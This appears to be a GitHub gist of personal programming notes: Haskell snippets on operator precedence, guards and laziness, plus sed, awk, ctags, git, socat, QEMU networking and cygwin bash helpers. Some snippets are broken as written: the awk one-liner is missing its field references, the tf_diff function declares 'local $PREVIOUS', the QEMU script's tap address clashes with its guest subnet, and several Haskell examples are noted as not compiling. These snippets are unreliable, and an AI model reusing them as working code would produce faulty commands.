prim Mul [Number a, Number b] = Number (a * b) | |
prim Div [Fractional a, Fractional b] = Fractional (a / b) | |
prim Div [Number a, Number b] = Number (a `div` b) | |
prim Or [Bool a, Bool b] = Bool (a || b) | |
prim Not [Bool a] = Bool (not a) | |
prim Eq [Number a, Number b] = Bool (a == b) | |
prim Eq [String a, String b] = Bool (a == b) | |
prim Less [Number a, Number b] = Bool (a < b) | |
prim Less [String a, String b] = Bool (a < b) | |
prim Great [Number a, Number b] = Bool (a > b) | |
prim Great [String a, String b] = Bool (a > b) --37 | |
f :: Exp -> Value | |
f _ = Number 3 | |
main = do | |
--Couldn't match expected type `Exp' with actual type `Value' | |
--eval [("y", (Number 40))] (Let [("x", (Literal (Number 2)))] (prim Add [(Variable "x"), (Variable "y")])) -- orig | |
let x = eval [("y", (Number 40))] (Let [("x", (Literal (Number 2)))] (Literal((prim Add [Number 3, Number 5])))) | |
let m = eval [("y", (Number 40))] (Literal (prim Add [Number 3, Number 4])) | |
let q = eval [("y", (Number 40))] (Literal (Number 2)) | |
let z = Let [("x", Literal (Number 2))] (Literal (Number 2)) | |
let zz = f z | |
putStrLn "hello" | |
--------------------------------- | |
[grep email addrs] | |
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt | |
--------------------------------- | |
[haskell fib using BangPatterns] | |
{-# LANGUAGE BangPatterns #-} | |
fib :: Int -> Int | |
fib n = go 0 1 0 | |
where | |
go !acc0 acc1 i | |
| i == n = acc0 | |
| otherwise = go acc1 (acc0 + acc1) (i+1) | |
--------------------------------- | |
[ycombinator] | |
Y = \f.(\x.f(xx))(\x.f(xx)) | |
--------------------------------- | |
[haskell tip] | |
180922 < nitrix> It's associative left-to-right. \x -> \y -> undefined reads as \x -> (\y -> undefined) | |
--------------------------------- | |
[sed print selected lines by deleting don't wants] | |
sed '99q;1,9d;12,99d' /tmp/klines | |
--------------------------------- | |
[sed selected lines with a quit] | |
sed -n '1p;3{p;q};5p' /tmp/xx | |
--------------------------------- | |
[how to git clone] | |
git clone ssh://[email protected]/truthadjustr/googletest.git mygoogletest | |
--------------------------------- | |
[xmlstarlet use -m always] | |
xml sel -t -m //Item/ExternalId -v "concat(.,',')" Items.xml | |
--------------------------------- | |
[nixos qemu networking] | |
#!/bin/sh | |
# | |
tunctl -u dx -t tap0 | |
ifconfig tap0 102.168.100.1 up | |
# qemu-kvm -hda nixos-disc.img -m 1024 -net nic -net tap,ifname=tap0,script=no | |
# *** Inside the Qemu guest *** | |
# ip addr set 192.168.100.2 dev ens3 | |
# route add default gw 192.168.100.1 | |
# echo 'nameserver 8.8.8.8' >> /etc/resolv.conf | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
iptables -t nat -A POSTROUTING -o wlp0s3 -j MASQUERADE | |
iptables -I FORWARD 1 -i tap0 -j ACCEPT | |
iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT | |
--------------------------------- | |
[haskell cannot use putStrLn in guard] | |
f 0 = show "value = 69" | |
f n | n > 10 = show $ n * 100 + p | |
| otherwise = show $ "value = " ++ show p | |
where | |
p = n*2 + q n | |
g 0 = 0 | |
g n | n `rem` 2 == 0 = n + 1 | |
g n | n > 10 = g (n-1) | |
g n = 2*n | |
q = (3*) | |
--------------------------------- | |
[haskell statement order matters] | |
f 0 = putStrLn $ "value = 69" | |
f n = | |
putStrLn $ "value = " ++ show p | |
where | |
p = n*2 | |
g 0 = 0 | |
g n | n `rem` 2 == 0 = n + 1 | |
g n | n > 10 = g (n-1) | |
g n = 2*n | |
--------------------------------- | |
[haskell mendero] | |
{--------------- tip on precedence -------------- | |
Here, i think the `++` function binded strongly | |
and attempted to concatinate the string from its | |
left to the `function pointer` to its right, thus | |
causing the error: | |
"sum = " ++ show $ a + b | |
Whereas, here the `++` still binded strongly | |
the same, but this time to its right is a | |
`function call` and thus it must first resolve | |
the result of the call: | |
"sum = " ++ show (a + b) | |
------------------------------------------------} | |
f a b = do | |
let s = a + b | |
let msg = concat.fn.words $ "the sum is " ++ show (a + b) | |
putStrLn msg | |
where | |
fn = map (++"_") | |
--------------------------------- | |
[haskell lite2] | |
-- only f0, f5, f7, f8 works | |
f0 = putStr.concat.map(++"\n") | |
f5 = putStr $ concat$map(++"\n") | |
f7 = concat $ map(++"\n") | |
f8 = putStr.concat $ map(++"\n") | |
f1 = putStr concat.map(++"\n") | |
f2 = putStr $ concat.map(++"\n") | |
f3 = (putStr) concat.map(++"\n") | |
f4 = putStr (concat.map(++"\n")) | |
f6 = concat.map(++"\n") | |
--------------------------------- | |
[haskell lite] | |
a=5 | |
--putStrLn "a" | |
b=a+1 | |
c="world" | |
n=69 | |
fn0 x y= | |
if x `rem` 2 == 0 then | |
"EVEN" ++ c | |
else if x == 5 then | |
case y of | |
"aaa" -> "AAA" ++ show x | |
"bbb" -> y ++ show (x - 1) | |
--otherwise -> y ++ show $ x + 1 | |
otherwise -> y ++ show (x + 1) | |
else | |
"odd" ++ q | |
where | |
q="LITE" | |
fn2 x y = | |
case (x > 0 && y < 10) of | |
True -> "none" | |
otherwise -> "many" | |
fn3 x y = | |
case (x < y || x `rem` 2 == 0) of | |
True -> "aaaaaaaaa" ++ p | |
False -> "bbbbbbb" | |
where | |
p="0123" | |
fn x | |
| x `rem` 2 == 0 = "EVEN" ++ show n ++ q | |
| otherwise = "odd" ++ fn3 x 2 | |
where | |
q = "abc" | |
main :: IO () | |
main = do | |
let d=c | |
let e="hello" | |
let f=d ++ e | |
let x=fn 5 | |
let c=fn 7 | |
putStrLn $ fn 5 | |
putStrLn "testing" | |
putStrLn $ "testing" ++ c ++ fn 2 | |
putStrLn ("testing" ++ c ++ "***\n") | |
putStrLn f | |
putStrLn e | |
putStrLn d | |
let z=fn 5 -- this cannot be the last line | |
putStr "\nBYE\n" | |
--------------------------------- | |
[haskell cbc] | |
f x = x * 2 | |
-- function application precedence > + operator | |
-- = 5 | |
n = f 3 * 2 | |
-- function application vs function application | |
-- same precedence. We go to associativity | |
-- which is left to right. The below does | |
-- not compile | |
-- p = f f 3 | |
-- below does not work coz $ < == | |
-- 3 == f $ 2 | |
data Color = White | Black | |
deriving Eq | |
c1 = White | |
c2 = Black | |
-- Eq only allows ==, /= comparison | |
flag0 = c1 /= c2 -- <,>,<=,>= needs to derive from Ord | |
-- Ord needs Eq (makes sense due to <= comparison) | |
data Piece = Pawn | Knight | Queen | King | |
deriving (Ord,Eq) | |
e2 = Pawn | |
e3 = Knight | |
e4 = Pawn | |
bCheck1 = e2 < e3 | |
bCheck2 = e2 <= e3 | |
fn :: Int -> Int | |
fn x = x + 1 | |
flag = (f.f.f $ 3) == (f $ f $ f $ 3) | |
flag2 = (f.f.f) 3 == (f $ f $ f $ 3) | |
flag3 = 3 == 1 + f 1 | |
--flag4 = 3 == (1 + f $ 1) | |
k f = f.f.f | |
g fn n = fn n | |
x = g g f 3 -- g (g f) 3 | |
y = g k f 3 -- g (k f) 3 | |
-- this proves associativity is | |
-- left to right | |
-- m = 40 | |
-- Else if `f 5` is computed first, | |
-- then an integer value 10 becomes | |
-- input to k. But k accepts a function | |
m = k f 5 | |
-- this does not work bcoz '1+f' comes | |
-- first, which is an error. | |
-- 1 + f $ 2 | |
--------------------------------- | |
[tf diff in cygwin] | |
tf_diff () { | |
[ $# -ne 2 ] && return | |
local TLINES=$(tput lines) | |
local ARTIFACT=$1 | |
local CHANGESET=$2 | |
local $PREVIOUS=$(tf history . /recursive | sed -n "/$CHANGESET/{n;p;}" | cut -d' ' -f1) | |
local TMPFILE=$(mktemp --suffix=.diff) | |
rm -f $TMPFILE | |
tf diff $ARTIFACT /version:$PREVIOUS~$CHANGESET > $TMPFILE; | |
if [ $(wc -l < $TMPFILE) -gt $TLINES ]; then | |
vim $TMPFILE | |
else | |
cat $TMPFILE | |
fi | |
rm -f $TMPFILE | |
} | |
--------------------------------- | |
[haskell ++ precedence to function pointer] | |
{--------------- tip on precedence -------------- | |
Here, i think the `++` function binded strongly | |
and attempted to concatinate the string from its | |
left to the `function pointer` to its right, thus | |
causing the error: | |
"sum = " ++ show $ a + b | |
Whereas, here the `++` still binded strongly | |
the same, but this time to its right is a | |
`function call` and thus it must first resolve | |
the result of the call: | |
"sum = " ++ show (a + b) | |
------------------------------------------------} | |
f a b = do | |
let s = a + b | |
let msg = concat.fn.words $ "the sum is " ++ show (a + b) | |
putStrLn msg | |
where | |
fn = map (++"_") | |
--------------------------------- | |
[modaf haskell] | |
f0 a b = | |
let m = 5 in | |
if a < b then do | |
let q = a + b + c | |
(b - a)/c + q | |
else | |
(a + b)/c + m | |
where | |
c = 2 | |
-- function application has higher precedence than + | |
g = f0 3 5 + 1 | |
f1 a b | |
| a < b = (b-a)/c | |
| otherwise = (a+b)/c | |
where | |
c = 2 | |
f2 a b = | |
let e = d + 2 | |
-- won't go into infinite loop | |
-- coz its lazy | |
f = g + 1 | |
g = f + 1 | |
d = 7 - c in | |
case (a + b) of | |
10 -> (b-a)/c + e | |
otherwise -> (a+b)/c + d | |
where | |
-- c = 2 + d -- cannot see d | |
c = 2 | |
f3 a b = | |
case a `mod` 2 == 0 of | |
True -> do | |
if a < b then | |
fromIntegral (b - a) / c | |
else | |
fromIntegral (a + b) / c | |
where | |
c | a `mod` 3 == 0 = 1 | |
| otherwise = 3 | |
otherwise -> 1 | |
--------------------------------- | |
[cygwin bash function to show dependency (aka cli-based depends.exe)] | |
dlldepends is a function | |
dlldepends () | |
{ | |
[ $# -eq 0 ] && return 1; | |
[ ! -r $1 ] && return 2; | |
dumpbin /dependents $1 | sed -n '/Image/,/Summary/p' | dos2unix | sed '/^$/d;1d;$d;s/ //g' | grep -v -E 'KERNEL32|USER32|ADVAPI32|MSVC' | |
} | |
--------------------------------- | |
[bash multiprocessing via subshells] | |
#!/bin/bash | |
# | |
( | |
for((i=0;i < 5;i++));do | |
echo "." | |
sleep 5 | |
done | |
)& | |
echo "********************" | |
for((i=0;i < 5;i++));do | |
echo "*" | |
sleep 1 | |
done | |
wait | |
--------------------------------- | |
[find new files] | |
find . -newermt '3 minute ago' | |
--------------------------------- | |
[haskell concatmap] | |
(.:) :: (c -> d) -> (a -> b -> c) -> a -> b -> d | |
(.:) = (.)(.)(.) | |
concatmap = concat .: map | |
--------------------------------- | |
[how not to do a unit test] | |
#include <iostream> | |
#include <limits.h> | |
#include <gtest/gtest.h> | |
int g = 50; | |
TEST(Test1,Testing2) { | |
g++; | |
} | |
TEST(Test1,Testing) { | |
int sum = 0; | |
int n = 5000 + g; | |
for (int i = 0;i <= 100;i++) { | |
sum += i; | |
} | |
g--; | |
ASSERT_EQ(sum,n); | |
} | |
TEST(Test1,Testing3) { | |
int sum = 0; | |
int n = 5000 + g; | |
for (int i = 0;i <= 100;i++) { | |
sum += i; | |
} | |
ASSERT_EQ(sum,n); | |
} | |
GTEST_API_ int main(int argc, char **argv) | |
{ | |
printf("Running main() from %s\n", __FILE__); | |
testing::InitGoogleTest(&argc, argv); | |
return RUN_ALL_TESTS(); | |
} | |
--------------------------------- | |
[quicky rsyslog server] | |
socat - udp4-listen:5140,reuseaddr,fork | |
--------------------------------- | |
[haskell tip] | |
19:04 < Tops2> Any operator has a lower precedence than a usual function. That means f x + g x must | |
be (f x) + (g x), because + is an operator. | |
18:59 < Tops2> a statement f g x will have implicit brackets (f g) x as function application is left | |
associative. Though this rule is only used to solve ambigious bracketing after looking | |
at operators and their precedence | |
--------------------------------- | |
[haskell fn associativity] | |
Prelude> f fn = fn | |
Prelude> g = (2*) | |
Prelude> f g 3 | |
6 | |
Prelude> | |
--------------------------------- | |
[haskell precedence $ versus .] | |
d = (2*) | |
d.d$2 | |
--------------------------------- | |
[haskell $ versus .] | |
(d . d) 2 = (\x -> d $ d x) 2 = d $ d 2 | |
--------------------------------- | |
[composing map of different fn] | |
(map (2*).map length) [[1,3],[2,0],[1..5]] | |
--------------------------------- | |
[awk glory] | |
awk 'BEGIN{} ~ /^class/{split(,a,=);d[a[2]]++} END{m=0;for (k in d){if (d[k] > 11) print k;}}' output.log | |
--------------------------------- | |
[python group by 3] | |
with open("/tmp/p") as f: | |
idx = 0 | |
q = [] | |
for line in f: | |
#print(line,end='') | |
a = line.rstrip('\n') | |
q.append(a) | |
idx = idx + 1 | |
if idx % 3 == 0: | |
print(q) | |
q.clear() | |
print(q) | |
--------------------------------- | |
[haskell guarded equation] | |
f x | x < 10 = "less than 10" | |
| otherwise = "greater than 10" | |
--------------------------------- | |
[abbreviate haskell] | |
module Acronym (abbreviate) where | |
import Data.Char (isAlpha,isUpper,toUpper) | |
abbreviate :: String -> String | |
abbreviate = concatMap initials.words.map replaceNonAlpha | |
initials :: String -> String | |
initials [] = [] | |
initials (x:xs) = toUpper x:rest | |
where | |
rest = | |
if not $ isAcronym xs | |
then filter isUpper xs | |
else [] | |
isAcronym :: String -> Bool | |
isAcronym = all isUpper | |
replaceNonAlpha :: Char -> Char | |
replaceNonAlpha x | |
| isAlpha x = x | |
| otherwise = ' ' | |
--------------------------------- | |
[haskell guards are sequenced] | |
divides d n = n `rem` d == 0 | |
ldf k n | |
| divides k n = k | |
| k^2 > n = n | |
| otherwise = ldf (k+1) n | |
ldf2 k n | |
| k^2 > n = n | |
| k == 4 = -1 | |
| divides k n = k | |
| otherwise = ldf2 (k+1) n | |
--------------------------------- | |
[ctags .vimrc] | |
:set tags=./tags;~/Projects | |
--------------------------------- | |
[ctags with exclude] | |
ctags -R --exclude=".git" -L src.listing | |
--------------------------------- | |
[socat copy file] | |
#Server sending file: | |
server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr | |
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat | |
#Server receiving file: | |
server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt | |
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876 | |
--------------------------------- | |
[git log] | |
git log --pretty=format:"%h%x09%ad%x09%x09%s" | |
--------------------------------- | |
[how to create tags] | |
find . -type f \( -name *.cpp -o -name *.h \) > src.list; ctags -R -L src.list | |
--------------------------------- | |
[ctags generate tags file from list of files/headers via find] | |
ctags -R -L src.listing | |
--------------------------------- | |
[windows dll cli dependency walker] | |
dlldepends is a function | |
dlldepends () | |
{ | |
[ $# -eq 0 ] && return 1; | |
[ ! -r $1 ] && return 2; | |
dumpbin /dependents $1 | sed -n '/Image/,/Summary/p' | dos2unix | sed '/^$/d;1d;$d;s/ //g' | |
} | |
--------------------------------- | |
[sed delete first and last lines] | |
sed '1d;$d' | |
--------------------------------- | |
[sed print between two patterns] | |
sed -n '/Image/,/Summary/p' | |
--------------------------------- | |
[sed delete if line contains] | |
sed -i '/.*Microsoft.Cpp.*/d' file.vcxproj | |
--------------------------------- | |
[grep a .dll suffix] | |
grep '\.dll' /tmp/fff | |
--------------------------------- | |
[remSeqDups.c] | |
void remSeqDups(int a[],int *n) | |
{ | |
int prev,j = 0; | |
for (int i = 0;i < *n;i++) { | |
if (i > 0) { | |
if (prev != a[i]) { | |
a[j] = a[i]; | |
j++; | |
prev = a[i]; | |
} | |
} else { | |
prev = a[i]; | |
j++; | |
} | |
} | |
*n = j; | |
} | |
--------------------------------- | |
[remSeqDups] | |
f a b = return (a+b) | |
remSeqDups [] = [] | |
remSeqDups [a] = [a] | |
remSeqDups (x:y:xs) | |
| x < y = x:remSeqDups (y:xs) | |
| otherwise = remSeqDups (y:xs) | |
--------------------------------- | |
[.vimrc for vim split navigation] | |
nnoremap <C-J> <C-W><C-J> | |
nnoremap <C-K> <C-W><C-K> | |
nnoremap <C-L> <C-W><C-L> | |
nnoremap <C-H> <C-W><C-H> | |
--------------------------------- | |
[correct git syntax] | |
git remote set-url origin [email protected]:truthadjustr/googletest.git | |
--------------------------------- | |
[hs guarded var initialization] | |
fn x = do | |
let a = 3 + p | |
let b = 5 - a | |
a + b + x + fn2 p + fn3 p + a + fn4 b | |
where | |
c | x < 0 = 5 | |
| otherwise = 8 | |
d = case x of | |
0 -> 4 | |
otherwise -> 5 | |
fn2 x = x^2 + p | |
fn3 x | |
| x < 0 = 5 | |
| x < -1 = 6 | |
| x >= 0 = 9 | |
| otherwise = 666 | |
fn4 q = | |
case x of | |
0 -> 3 + p | |
otherwise -> 2 + q | |
p = 5 | |
--------------------------------- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment